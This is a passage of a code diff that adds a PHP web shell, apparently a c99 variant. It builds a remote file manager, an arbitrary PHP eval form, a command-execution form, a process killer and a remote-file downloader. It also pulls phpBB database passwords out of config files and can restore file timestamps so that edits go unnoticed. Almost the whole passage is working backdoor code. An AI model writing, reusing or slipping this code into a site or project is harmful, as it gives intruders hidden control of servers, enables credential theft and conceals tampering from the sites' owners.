+        $objects["folders"] = array_reverse($objects["folders"]);
+        $objects["files"] = array_reverse($objects["files"]);
+      }
+      $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+      $tab = array();
+      $tab["cols"] = array($row);
+      $tab["head"] = array();
+      $tab["folders"] = array();
+      $tab["links"] = array();
+      $tab["files"] = array();
+      $i = 0;
+      foreach ($objects as $a) {
+        $v = $a[0];
+        $o = basename($v);
+        $dir = dirname($v);
+        if ($disp_fullpath) {$disppath = $v;}
+        else {$disppath = $o;}
+        $disppath = str2mini($disppath,60);
+        if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+        elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+        foreach ($regxp_highlight as $r) {
+          if (ereg($r[0],$o)) {
+            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; dQ99shexit();}
+            else {
+              $r[1] = round($r[1]);
+              $isdir = is_dir($v);
+              if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
+                if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+                $disppath = $r[2].$disppath.$r[3];
+                if ($r[4]) {break;}
+              }
+            }
+          }
+        }
+        $uo = urlencode($o);
+        $ud = urlencode($dir);
+        $uv = urlencode($v);
+        $row = array();
+        if ($o == ".") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "CURDIR";
+        }
+        elseif ($o == "..") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "UPDIR";
+        }
+        elseif (is_dir($v)) {
+          if (is_link($v)) {
+            $disppath .= " => ".readlink($v);
+            $type = "LINK";
+            $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          else {
+            $type = "DIR";
+            $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {
+          $ext = explode(".",$o);
+          $c = count($ext)-1;
+          $ext = $ext[$c];
+          $ext = strtolower($ext);
+          $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
+          $row[] = view_size($a[1]);
+        }
+        $row[] = @date("d.m.Y H:i:s",$a[2]);
+        if (!$win) { $row[] = $a[3]; }
+        $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+        if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+        else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+        if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
+        else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
+        if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+        elseif (is_link($v)) {$tab["links"][] = $row;}
+        elseif (is_dir($v)) {$tab["folders"][] = $row;}
+        elseif (is_file($v)) {$tab["files"][] = $row;}
+        $i++;
+      }
+    }
+    // Compiling table
+    $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+    echo "<div class=barheader>.: ";
+    if (!empty($dQ_infohead)) { echo $dQ_infohead; }
+    else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+    echo " :.</div>\n";
+    echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
+         "<table class=explorer>";
+    foreach($table as $row) {
+      echo "<tr>";
+      foreach($row as $v) {echo "<td>".$v."</td>";}
+      echo "</tr>\r\n";
+    }
+    echo "</table>".
+         "<script>".
+         "function ls_setcheckboxall(status) {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
+         "}".
+         "function ls_reverse_all() {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
+         "}".
+         "</script>".
+         "<div align=\"right\">".
+         "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
+         "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
+      echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"dQ_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+    echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+    echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+    if ($usefsbuff) {
+      echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+      echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+      echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+    }
+    echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
+    echo "</form>";
+  }
+}
+if ($act == "tools") { tools(); }
+##[ PHP FILESYSTEM TRICKZ (By diKi) ]##
+if ($act == "phpfsys") { 
+  echo "<div align=left>";
+  $fsfunc = $phpfsysfunc;
+  if ($fsfunc=="copy") {
+    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
+    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
+  }
+  elseif ($fsfunc=="rename") {
+    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
+    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
+  }
+  elseif ($fsfunc=="chmod") {
+    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
+    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
+  }
+  elseif ($fsfunc=="read") {
+    $darg = $d.$arg1;
+    if ($hasil = @file_get_contents($darg)) {
+      echo "<b>Filename:</b> ".$darg."<br>";
+      echo "<center><textarea cols=135 rows=30>";
+      echo htmlentities($hasil);
+      echo "</textarea></center>\n";
+    }
+    else { echo "<div class=dQerrmsg> Couldn't open ".$darg."<div>"; }
+  }
+  elseif ($fsfunc=="write") {
+    $darg = $d.$arg1;
+    if(@file_put_contents($darg,$arg2)) {
+      echo "<b>Saved!</b> ".$darg;
+
+    }
+    else { echo "<div class=dQerrmsg>Can't write to $darg!</div>"; }
+  }
+  elseif ($fsfunc=="downloadbin") {
+    $handle = fopen($arg1, "rb");
+    $contents = '';
+    while (!feof($handle)) {
+      $contents .= fread($handle, 8192);
+    }
+    $r = @fopen($d.$arg2,'w');
+    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+    else { echo "<div class=dQerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+    fclose($r);
+    fclose($handle);
+  }
+  elseif ($fsfunc=="download") {
+    $text = implode('', file($arg1));
+    if ($text) {
+      $r = @fopen($d.$arg2,'w');
+      if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+      else { echo "<div class=dQerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+      fclose($r);
+    }
+    else { echo "<div class=dQerrmsg>Can't download from $arg1!</div>";}
+  }
+  elseif ($fsfunc=='mkdir') {
+    $thedir = $d.$arg1;
+    if ($thedir != $d) {
+      if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
+      elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
+      else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
+    }
+    else { echo "Can't create current dir:<b> $thedir</b>"; }
+  }
+  elseif ($fsfunc=='fwritabledir') {
+    function recurse_dir($dir,$max_dir) {
+      global $dir_count;
+      $dir_count++;
+      if( $cdir = dir($dir) ) {
+        while( $entry = $cdir-> read() ) {
+          if( $entry != '.' && $entry != '..' ) {
+            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
+             if ($dir_count > $max_dir) { return; }
+              echo "[".$dir_count."] ".$dir.$entry."\n";
+              recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
+            }
+          }
+        }
+        $cdir->close();
+      }
+    }
+    if (!$arg1) { $arg1 = $d; }
+    if (!$arg2) { $arg2 = 10; }
+    if (is_dir($arg1)) {
+      echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
+      echo "<pre>";
+      recurse_dir($arg1,$arg2);
+      echo "</pre>";
+      $total = $dir_count - 1;
+      echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
+    }
+    else {
+      echo "<div class=dQerrmsg>Directory is not exist or permission denied!</div>";
+    }
+  }
+  else {
+    if (!$arg1) { echo "<div class=dQerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
+    else {
+      if ($hasil = $fsfunc($arg1)) {
+        echo "<b>Result of $fsfunc $arg1:</b><br>";
+        if (!is_array($hasil)) { echo "$hasil\n"; }
+        else {
+          echo "<pre>";
+          foreach ($hasil as $v) { echo $v."\n"; }
+          echo "</pre>";
+        }
+      }
+      else { echo "<div class=dQerrmsg>$fsfunc $arg1 failed!</div>\n"; }
+    }
+  }
+  echo "</div>\n";
+}
+if ($act == "processes") {
+  echo "<div class=barheader>.: Processes :.</div>\n";
+  if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
+  else { $handler = "tasklist"; }
+  $ret = dQ99exec($handler);
+  if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
+  else {
+    if (empty($processes_sort)) { $processes_sort = $sort_default; }
+    $parsesort = parsesort($processes_sort);
+    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+    $k = $parsesort[0];
+    if ($parsesort[1] != "a") {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+    }
+    else {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
+    }
+    $ret = htmlspecialchars($ret);
+    if (!$win) { //Not Windows
+      if ($pid) {
+        if (is_null($sig)) { $sig = 9; }
+        echo "Sending signal ".$sig." to #".$pid."... ";
+        if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; }
+      }
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      $stack = explode("\n",$ret);
+      $head = explode(" ",$stack[0]);
+      unset($stack[0]);
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) {
+          $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
+        }
+      }
+      $head[$i] = "";
+      $prcs = array();
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[10] = join(" ",array_slice($line,10));
+          $line = array_slice($line,0,11);
+          if ($line[0] == get_current_user()) { $line[0] = "<font color=green>".$line[0]."</font>"; }
+          $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+          $prcs[] = $line;
+        }
+      }
+    }
+    //For Windows - Fixed By diKi
+    else {
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
+      $ret = convert_cyr_string($ret,"d","w");
+      $stack = explode("\n",$ret);
+      unset($stack[0],$stack[2]);
+      $stack = array_values($stack);
+      $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
+      $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
+      $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
+      $head = explode(" ",$stack[0]);
+      $stack = array_slice($stack,1);
+      $head = array_values($head);
+      if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
+      else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
+      if ($k > count($head)) {$k = count($head)-1;}
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
+      }
+      $prcs = array();
+      unset($stack[0]);
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[4] = str_replace(".","",$line[4]);
+          $line[4] = intval($line[4]) * 1024;
+          unset($line[5]);
+          $prcs[] = $line;
+        }
+      }
+    }
+    $head[$k] = "<b>".$head[$k]."</b>".$y;
+    $v = $processes_sort[0];
+    usort($prcs,"tabsort");
+    if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
+    $tab = array();
+    $tab[] = $head;
+    $tab = array_merge($tab,$prcs);
+    echo "<table class=explorer>\n";
+    foreach($tab as $i=>$k) {
+      echo "<tr>";
+      foreach($k as $j=>$v) {
+        if ($win and $i > 0 and $j == 4) { $v = view_size($v); }
+        echo "<td>".$v."</td>";
+      }
+      echo "</tr>\n";
+    }
+    echo "</table>";
+  }
+}
+if ($act == "eval") {
+  if (!empty($eval)) {
+    echo "Result of execution this PHP-code:<br>";
+    $tmp = @ob_get_contents();
+    $olddir = realpath(".");
+    @chdir($d);
+    if ($tmp) {
+      @ob_clean();
+      eval($eval);
+      $ret = @ob_get_contents();
+      $ret = convert_cyr_string($ret,"d","w");
+      @ob_clean();
+      echo $tmp;
+      if ($eval_txt) {
+        $rows = count(explode("\r\n",$ret))+1;
+        if ($rows < 10) {$rows = 10;}
+        echo "<br><textarea cols=\"115\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+      }
+      else {echo $ret."<br>";}
+    }
+    else {
+      if ($eval_txt) {
+        echo "<br><textarea cols=\"115\" rows=\"15\" readonly>";
+        eval($eval);
+        echo "</textarea>";
+      }
+      else {echo $ret;}
+    }
+    @chdir($olddir);
+  }
+  else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"115\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f") {
+  echo "<div align=left>";
+  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
+    if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+    else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+  }
+  else {
+    $r = @file_get_contents($d.$f);
+    $ext = explode(".",$f);
+    $c = count($ext)-1;
+    $ext = $ext[$c];
+    $ext = strtolower($ext);
+    $rft = "";
+    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+    if (empty($ft)) {$ft = $rft;}
+    $arr = array(
+        array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+        array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+        array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+        array("Code","code"),
+        array("Session","phpsess"),
+        array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+        array("SDB","sdb"),
+        array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+        array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+        array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+        array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+        array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+    );
+    echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+    foreach($arr as $t) {
+      if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+      elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+      else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+      echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+    }
+    echo "<hr size=\"1\" noshade>";
+    if ($ft == "info") {
+      echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+      if (!$win) {
+        echo "<tr><td><b>Owner/Group</b></td><td> ";
+        $ow = posix_getpwuid(fileowner($d.$f));
+        $gr = posix_getgrgid(filegroup($d.$f));
+        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+      }
+      echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+      $fi = fopen($d.$f,"rb");
+      if ($fi) {
+        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+        else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+        $n = 0;
+        $a0 = "00000000<br>";
+        $a1 = "";
+        $a2 = "";
+        for ($i=0; $i<strlen($str); $i++) {
+          $a1 .= sprintf("%02X",ord($str[$i]))." ";
+          switch (ord($str[$i])) {
+            case 0:  $a2 .= "<font>0</font>"; break;
+            case 32:
+            case 10:
+            case 13: $a2 .= "&nbsp;"; break;
+            default: $a2 .= htmlspecialchars($str[$i]);
+          }
+          $n++;
+          if ($n == $hexdump_rows) {
+            $n = 0;
+            if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+            $a1 .= "<br>";
+            $a2 .= "<br>";
+          }
+        }
+        echo "<table border=1 bgcolor=#666666>".
+             "<tr><td bgcolor=#666666>".$a0."</td>".
+             "<td bgcolor=#000000>".$a1."</td>".
+             "<td bgcolor=#000000>".$a2."</td>".
+             "</tr></table><br>";
+      }
+      $encoded = "";
+      if ($base64 == 1) {
+        echo "<b>Base64 Encode</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+      }
+      elseif($base64 == 2) {
+        echo "<b>Base64 Encode + Chunk</b><br>";
+        $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+      }
+      elseif($base64 == 3) {
+        echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+        $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+      }
+      elseif($base64 == 4) {
+        $text = file_get_contents($d.$f);
+        $encoded = base64_decode($text);
+        echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+        <P>";
+  }
+  elseif ($ft == "html") {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {dQ99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess") {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe") {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code") {
+    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
+      $arr = explode("\n",$r);
+      if (count($arr == 18)) {
+        include($d.$f);
+        echo "<b>phpBB configuration is detected in this file!<br>";
+        if ($dbms == "mysql4") {$dbms = "mysql";}
+        if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
+        echo "Parameters for manual connect:<br>";
+        $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+        foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+        echo "</b><hr size=\"1\" noshade>";
+      }
+    }
+    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+    if (!empty($white)) {@ob_clean();}
+    highlight_file($d.$f);
+    if (!empty($white)) {dQ99shexit();}
+    echo "</div>";
+  }
+  elseif ($ft == "download") {
+    @ob_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".filesize($d.$f));
+    header("Content-disposition: attachment; filename=\"".$f."\";");
+    echo $r;
+    exit;
+  }
+  elseif ($ft == "notepad") {
+    @ob_clean();
+    header("Content-type: text/plain");
+    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+    echo($r);
+    exit;
+  }
+  elseif ($ft == "img") {
+    $inf = getimagesize($d.$f);
+    if (!$white) {
+      if (empty($imgsize)) {$imgsize = 20;}
+      $width = $inf[0]/100*$imgsize;
+      $height = $inf[1]/100*$imgsize;
+      echo "<center><b>Size:</b>&nbsp;";
+      $sizes = array("100","50","20");
+      foreach ($sizes as $v) {
+        echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+        if ($imgsize != $v ) {echo $v;}
+        else {echo "<u>".$v."</u>";}
+        echo "</a>&nbsp;&nbsp;&nbsp;";
+      }
+      echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+    }
+    else {
+      @ob_clean();
+      $ext = explode($f,".");
+      $ext = $ext[count($ext)-1];
+      header("Content-type: ".$inf["mime"]);
+      readfile($d.$f);
+      exit;
+    }
+  }
+  elseif ($ft == "edit") {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}
+}
+echo "</div>\n";
+}
+}
+else {
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
